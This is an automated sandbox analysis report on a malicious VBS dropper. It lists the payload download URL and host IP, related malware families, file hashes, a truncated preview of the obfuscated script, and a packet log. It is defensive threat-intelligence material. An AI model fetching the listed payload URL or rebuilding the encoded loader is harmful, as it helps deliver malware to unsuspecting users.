                  104.196.109.209
                  truefalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  https://transfer.adttemp.com.br/qcExh/99gram.txtfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://transfer.adttemp.com.brpowershell.exe, 00000003.00000002.3343659186.000001A9AD0D9000.00000004.00000800.00020000.00000000.sdmptrueunknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.3343659186.000001A9AB661000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.3343659186.000001A9AB661000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://go.micropowershell.exe, 00000003.00000002.3343659186.000001A9AD3B5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://transfer.adttemp.com.brpowershell.exe, 00000003.00000002.3343659186.000001A9ACC03000.00000004.00000800.00020000.00000000.sdmptrueunknown
                    https://contoso.com/powershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.3343659186.000001A9AB4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.3343659186.000001A9AB4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.vpowershell.exe, 00000003.00000002.3343374740.000001A9AB33B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.3343659186.000001A9AB661000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.196.109.209
                    transfer.adttemp.com.brUnited States
                    15169GOOGLEUSfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1533048
                    Start date and time:2024-10-14 11:13:30 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs
                    renamed because original name is a hash value
                    Original Sample Name:nostanas dokuments rinam Nr.52-FK-24.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@14/3@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    05:15:02API Interceptor43x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    3b5074b1b5d032e5620f69f9f700ff0eEQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                    • 104.196.109.209
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                    • 104.196.109.209
                    Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                    • 104.196.109.209
                    3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                    • 104.196.109.209
                    3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                    • 104.196.109.209
                    Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                    • 104.196.109.209
                    ASL OTSL 2 ship's Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 104.196.109.209
                    https://payrollruntimesheet.weebly.com/verify.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.196.109.209
                    SecuriteInfo.com.Win32.Evo-gen.25810.23454.exeGet hashmaliciousXWormBrowse
                    • 104.196.109.209
                    SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exeGet hashmaliciousXWormBrowse
                    • 104.196.109.209
                    No context
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:modified
                    Size (bytes):11887
                    Entropy (8bit):4.901437212034066
                    Encrypted:false
                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    File type:ASCII text, with very long lines (35174), with CRLF line terminators
                    Entropy (8bit):4.978932673745877
                    TrID:
                      File name:nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs
                      File size:141'940 bytes
                      MD5:1f158aaa048de08d758d4ed4d65be651
                      SHA1:7f443dad2bd9e472e96161979f8f628b9c5232a2
                      SHA256:453f9f1860d49936a81140bc75488afdf01dfc5d4f23671c177a9310471b4b08
                      SHA512:9ae9b6fe163d34c6043ac9c5512db614a789559047e0492579e19009e58382bd7d10da9fdb28c4d492e6ba2d1a04294cdf657274d2d58f63c0b597a099796604
                      SSDEEP:1536:/F6q5R444444443u9rrbPWZg744444444444444444444B444444444444444444:t6qjoc9wtni3U2v53Dwq5tc1qrieSp
                      TLSH:3ED36DF60003AECA57570952D40C2A41FCA878DBB7A4D6E4FE4470D657EA029EEE4EF1
                      File Content Preview:On Error Resume Next..For x = 0 To 38.. WScript.Sleep(1000).. Next....Apnjitgxojc40="==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+kHb
                      Icon Hash:68d69b8f86ab9a86
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2024 11:15:04.706783056 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:04.706842899 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:04.706938028 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:04.714818001 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:04.714835882 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.352999926 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.353091955 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.358151913 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.358185053 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.358573914 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.365932941 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.411412954 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.481344938 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.481453896 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.481513023 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.481549978 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.481617928 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.481705904 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.481765032 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.481858015 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.481909037 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.499533892 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.499602079 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.570940018 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.571019888 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.571167946 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.571219921 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.571403980 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.571460962 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.572664022 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.572731018 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.573652029 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.573705912 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.575164080 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.575226068 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.590641975 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.590745926 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.591578007 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.591664076 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.660768986 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.660860062 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.660908937 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.660973072 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.661015034 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.661072016 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.661376953 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.661442995 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.661557913 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.661617994 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.662250042 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.662312984 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.662408113 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.662463903 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.663552046 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.663616896 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.663642883 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.663695097 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.664278984 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.664335966 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.664395094 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.664447069 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.680743933 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.680824041 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.680955887 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.681009054 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.681436062 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.681513071 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.681525946 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.681566000 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.750102997 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.750174999 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.750194073 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.750230074 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.750574112 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.750631094 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.750634909 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.750669003 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.751112938 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.751125097 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.751166105 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.751169920 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.751878977 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.751935005 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.751939058 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.752655983 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.752715111 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.752720118 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.753225088 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.753279924 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.753283978 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.753835917 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.753897905 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.753902912 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.754507065 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.754563093 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.754566908 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.755177975 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.755280018 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.755284071 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.769851923 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.769936085 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.769942045 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.770498991 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.770562887 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.770566940 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.770591021 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.770631075 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.770633936 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.770643950 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.770665884 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.771248102 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.771303892 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.771307945 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.771344900 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.771411896 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.826098919 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.839267969 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839279890 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839350939 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.839355946 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839396954 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.839529037 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839569092 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839577913 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.839581966 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839602947 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.839790106 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839847088 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.839850903 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.839884996 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.840034962 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.840081930 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.840253115 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.840316057 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.840542078 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.840580940 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.840677023 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.840682030 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.840719938 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.840884924 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.840945005 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.841276884 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841319084 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841341972 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.841346025 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841362953 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.841769934 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841813087 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841814995 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.841824055 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841847897 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.841860056 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.841900110 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.841903925 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.842406034 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.842439890 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.842457056 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.842462063 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.842495918 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.844300985 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.844352007 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.844579935 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.844621897 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.844624043 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.844635010 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.844666004 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.844937086 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.844996929 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.845124960 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.845160961 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.845171928 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.845175982 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.845208883 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.845563889 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.845607042 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.859361887 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.859445095 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.859584093 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.859641075 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.859792948 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.859831095 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.859839916 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.859850883 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.859874010 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.859888077 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.860121965 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.860172033 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.860397100 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.860445023 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.860570908 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.860621929 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.860696077 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.860749960 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.928976059 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.929115057 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.929296970 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.929347992 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.929393053 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.929440975 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.929601908 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.929652929 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.929661989 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.929666996 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.929691076 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930141926 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930179119 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930200100 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930205107 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930236101 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930617094 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930656910 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930660963 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930804968 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930846930 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930851936 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930859089 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930890083 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930893898 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.930927992 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.930969954 CEST44349872104.196.109.209192.168.2.5
                      Oct 14, 2024 11:15:05.931009054 CEST49872443192.168.2.5104.196.109.209
                      Oct 14, 2024 11:15:05.934442997 CEST49872443192.168.2.5104.196.109.209
                      TimestampSource PortDest PortSource IPDest IP
